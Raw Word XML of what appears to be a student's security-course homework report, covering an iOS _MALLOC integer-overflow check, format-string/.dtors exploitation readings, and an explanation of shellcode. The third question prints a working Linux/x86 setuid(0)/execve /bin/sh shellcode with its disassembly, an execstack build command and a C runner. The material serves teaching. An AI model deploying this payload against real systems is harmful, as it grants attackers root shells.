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20" w:rsidRPr="00EC4E20" w:rsidRDefault="008F501A" w:rsidP="008F501A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PRE</w:t>
      </w:r>
      <w:r w:rsidR="00EC4E20" w:rsidRPr="00EC4E20">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00146E0D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A454F" w:rsidRPr="00EC4E20" w:rsidRDefault="003A454F" w:rsidP="00EC4E20">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4E20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>吴瑞欣-E41614059</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1、 （选做）Memory management</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The iOS   _MALLOC(size_t size, int type, int flags) function allocates size bytes on the heap. Internally blocks are represented as a length field followed by a data field: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struct _mhead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size_t  mlen;</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char    dat[0];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The mlen field is used by the free() function to determine how much space needs to be freed. In iOS 4.x the _MALLOC function was implemented as follows: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1   void * _MALLOC(size_t size, int type, int flags)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2     struct _mhead  *hdr;</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3     size_t memsize = sizeof (*hdr) + size;</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4     hdr = (void *)kalloc(memsize);  // allocate memory</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5     hdr-&gt;mlen = memsize;</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6     return  (hdr-&gt;dat);</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7  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w: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In iOS 5.x the following two lines were added after line 3:</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int o = memsize &lt; size ? 1 : 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if (o)  return (NULL);</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Why were these lines added in iOS5.x? Briefly describe an attack that may be possible without these lines.</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 xml:space="preserve">iOS _MALLOC（size_t size，int type，int flags）函数在堆上分配大小字节。内部块表示为长度字段，后跟数据字段： </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struct _mhead {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">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  </w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>size_t mlen;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">char dat [0]; </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free（）函数使用mlen字段来确定需要释放多少空间。在iOS 4.x中，_MALLOC函数实现如下：</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1 void * _MALLOC（size_t size，int type，int flags）{</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2 struct _mhead * hdr;</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3 size_t memsize = sizeof（* hdr）+ size;</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4 hdr =（void *）kalloc（memsize）; //分配内存</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5 hdr-&gt; mlen = memsize;</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6返回（hdr-&gt; dat）;</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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7}</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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iOS 5.x中，在第3行之后添加了以下两行：</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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int o = memsize &lt;size？ 1：0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRP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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if（o）return（NULL）;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>为什么在</w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iOS5.x中添加这些行？简要描述没有这些线路可能发生的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762FF0" w:rsidRDefault="00762FF0" w:rsidP="00762FF0">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00762FF0" w:rsidRPr="00762FF0" w:rsidRDefault="00762FF0" w:rsidP="00762FF0">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C2BF2" w:rsidRPr="00762FF0" w:rsidRDefault="003C2BF2"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引用文献：</w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iOS Kernel Heap Armageddon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C2BF2" w:rsidRPr="00762FF0" w:rsidRDefault="003C2BF2"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网址：</w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>extension://cdonnmffkdaoajfknoeeecmchibpmkmg/static/pdf/web/viewer.html?file=https%3A%2F%2Fmedia.blackhat.com%2Fbh-us-12%2FBriefings%2FEsser%2FBH_US_12_Esser_iOS_Kernel_Heap_Armageddon_WP.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="00762FF0" w:rsidRDefault="003C2BF2"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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The addition of the size header has two downsides, first it requires an integer addition in order to determine the size to be allocated and secondly it represents extra heap meta data that when overwritten can lead to exploitable conditions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="00762FF0" w:rsidRDefault="0091510E"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翻译：</w:t>
      </w:r>
      <w:r w:rsidR="003C2BF2" w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>加法确定头部大小有两个缺点，首先它需要整数加法以确定要分配的大小，其次它表示额外的堆元数据，当被覆盖时可能导致可利用的条件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="00762FF0" w:rsidRDefault="0091510E"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因而可以得出结论这两行代码的设置为了防止堆内存被覆盖，溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091510E" w:rsidRPr="00762FF0" w:rsidRDefault="0091510E" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>为了顺利完成下节课，建议仔细阅读下面这篇文章的</w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Level 9部分：</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https://infamoussyn.com/2013/09/11/smashthestack-io-walkthrough-part-b-levels-6-10/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https://tomasuh.github.io/2015/01/19/IO-Wargame.html</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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章中利用</w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.dtors的办法只是利用格式化字符串执行shellcode的一种形式。</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printf中%2$d这类格式的含义如下：</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Character Description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n$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n is the number of the parameter to display using this format specifier, allowing the parameters provided to be output multiple times, using varying format specifiers or in different orders. This is a POSIX extension and not in C99.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Example: printf("%2$d %1$#x %1$d",16,17) produces "17 0x10 16" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="00826175" w:rsidRDefault="008E51CD" w:rsidP="00826175">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00826175" w:rsidRPr="00826175" w:rsidRDefault="00826175" w:rsidP="00826175">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826175">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00826175" w:rsidRPr="00826175" w:rsidRDefault="00826175" w:rsidP="00826175">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>确实没看懂，不知道它在讲什么，似乎在讲利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00826175">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>argv [1]地址覆盖.dtor函数指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，具体的内容希望可以上到这个知识点在该预习报告中体现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00826175" w:rsidRPr="00826175" w:rsidRDefault="00826175" w:rsidP="00826175">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00826175" w:rsidRPr="008E51CD" w:rsidRDefault="00826175" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="00826175" w:rsidP="00826175">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="00F03369">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3、解释一下什么叫shellcode。下面这段代码被root编译并且suid后，普通用户是否能获得root shell？解释</w:t>
      </w:r>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"其中的含义。</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gcc -z execstack -o setuid-linux setuid-linux.c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setuid-linux.c - setuid/execve shellcode for Linux/x86</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Short fully-functional setuid(0) and /bin/sh execve() shellcode.</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setuid(0)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8049380:       6a 17                   push   $0x17</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8049382:       58                      pop    %eax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8049383:       31 db                   xor    %ebx,%ebx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8049385:       cd 80                   int    $0x80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execve("/bin//sh", ["/bin//sh"], NULL)</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8049387:       6a 0b                   push   $0xb</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8049389:       58                      pop    %eax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804938a:       99                      cltd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804938b:       52                      push   %edx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804938c:       68 2f 2f 73 68          push   $0x68732f2f</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8049391:       68 2f 62 69 6e          push   $0x6e69622f</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8049396:       89 e3                   mov    %esp,%ebx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8049398:       52                      push   %edx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8049399:       53                      push   %ebx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804939a:       89 e1                   mov    %esp,%ecx</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 804939c:       cd 80                   int    $0x80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 xml:space="preserve">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char sc[] = /* 7 + 23 = 30 bytes */</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"\x6a\x17\x58\x31\xdb\xcd\x80"</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"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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main()</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E51CD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>int (*f)() = (int (*)())sc; f();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRDefault="008E51CD" w:rsidP="00487007">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487007" w:rsidRDefault="00487007" w:rsidP="00487007">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00762FF0" w:rsidRPr="00762FF0" w:rsidRDefault="00762FF0" w:rsidP="00762FF0">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487007" w:rsidRPr="00762FF0" w:rsidRDefault="00487007" w:rsidP="00487007">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引用查阅wikipedia：</w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://en.wikipedia.org/wiki/Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E51CD" w:rsidRPr="00762FF0" w:rsidRDefault="00487007" w:rsidP="008E51CD">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487007" w:rsidRPr="00762FF0" w:rsidRDefault="00487007" w:rsidP="00487007">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在黑客中，shellcode是一小段代码用于软件漏洞的利用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F03369" w:rsidRPr="00762FF0" w:rsidRDefault="00F03369" w:rsidP="00F03369">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="300" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762FF0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.</w:t>
      </w:r>
    </w:p>
